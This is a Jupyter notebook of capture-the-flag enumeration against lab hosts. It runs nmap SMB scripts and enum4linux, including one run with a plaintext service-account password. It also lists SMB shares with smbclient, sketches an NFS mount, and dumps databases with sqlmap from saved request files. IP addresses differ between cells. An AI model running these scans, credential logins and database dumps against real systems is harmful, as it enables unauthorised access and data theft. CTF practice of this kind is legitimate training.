# Service Enumeration:

In [1]:
%env TARGET=10.10.155.48

env: TARGET=10.10.167.66


# SMB:

In [2]:
!nmap -v -sV --open -Pn  -p 137,139,445 --script=smb-ls $TARGET

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-06 21:30 UTC
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating ARP Ping Scan at 21:30
Scanning 10.10.167.66 [1 port]
Completed ARP Ping Scan at 21:30, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:30
Completed Parallel DNS resolution of 1 host. at 21:30, 0.00s elapsed
Initiating SYN Stealth Scan at 21:30
Scanning ip-10-10-167-66.eu-west-1.compute.internal (10.10.167.66) [3 ports]
Completed SYN Stealth Scan at 21:30, 1.23s elapsed (3 total ports)
Initiating Service scan at 21:30
NSE: Script scanning 10.10.167.66.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Script Post-scanning.


In [3]:
!nmap -v -sV --open -Pn  -p 137,139,445 --script=smb-os-discovery,smb-enum-shares,smb-security-mode $TARGET --script-args=smbbasic=1,smbsign=ignore | tee smb_results.txt

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-06 21:30 UTC
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating ARP Ping Scan at 21:30
Scanning 10.10.167.66 [1 port]
Completed ARP Ping Scan at 21:30, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:30
Completed Parallel DNS resolution of 1 host. at 21:30, 0.00s elapsed
Initiating SYN Stealth Scan at 21:30
Scanning ip-10-10-167-66.eu-west-1.compute.internal (10.10.167.66) [3 ports]
Completed SYN Stealth Scan at 21:30, 1.24s elapsed (3 total ports)
Initiating Service scan at 21:30
NSE: Script scanning 10.10.167.66.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Script Post-scanning.


In [4]:
import os

try:
    result = !cat smb_results.txt | grep account_used

    anon_user = result[0].split(':')[-1].strip()
except:
    anon_user = "guest"

anon_user

'guest'

In [5]:
!./enum4linux.pl -a -u {anon_user} {os.environ['TARGET']}

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct  6 21:30:37 2021

 =========================================( Target Information )=========================================

Target ........... 10.10.167.66
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.167.66 )============================

Can't exec "dig": No such file or directory at ./enum4linux.pl line 390.
Use of uninitialized value $global_workgroup in pattern match (m//) at ./enum4linux.pl line 391.

[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.167.66 )================================

Looking up status of 10.10.167.66
No reply from 10.10.167.66

 ===================================( Session Check on 10.10.167.66 )=============================

In [6]:
!./enum4linux.pl $TARGET -u svc-admin -p management2005

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct  6 21:31:03 2021

 =========================================( Target Information )=========================================

Target ........... 10.10.167.66
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.167.66 )============================

Can't exec "dig": No such file or directory at ./enum4linux.pl line 390.
Use of uninitialized value $global_workgroup in pattern match (m//) at ./enum4linux.pl line 391.

[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.167.66 )================================

Looking up status of 10.10.167.66
No reply from 10.10.167.66

 ===================================( Session Check on 10.10.167.66 )==================================

In [7]:
!smbclient -L 10.10.133.181 -U svc-admin

do_connect: Connection to 10.10.133.181 failed (Error NT_STATUS_HOST_UNREACHABLE)


In [8]:
%env SHARE=Users

env: SHARE=Users


In [9]:
!echo Run this:
!echo cd \'$(pwd)\'
!echo smbclient //$TARGET/$SHARE -U guest

Run this:
cd '/workspace/ctf-notebooks'
smbclient //10.10.167.66/Users -U guest


In [10]:
from web_footprinting_utils import show_term

show_term()

TypeError: show_term() missing 1 required positional argument: 'ip'

#### Use ls, get, cd to pull down any needed files in SMB...

In [ ]:
!ls

In [ ]:
!cat log.txt

# NFS Anonymous Mounting:

In [ ]:
from getpass import getpass
import os

%env RDIR = /var

In [ ]:
# !mkdir -p my_mount
# !echo { getpass() } | sudo -S sudo mount {os.environ['TARGET']}:{os.environ['RDIR']} my_mount
# !ls -la my_mount

# SQL Map:

In [ ]:
!sqlmap -r bugle_user.txt --dbms=mariadb --dump --batch

In [ ]:
!sqlmap -r bugle_admin.txt --dbms=mariadb --dump --batch

In [ ]:
!sqlmap -r bugle_admin.txt --dbms=mariadb --dump --batch --level=5

# FTP:

ftp 10.10.28.39

anonymous

no password

#### remember to enable binary mode to download binaries:

binary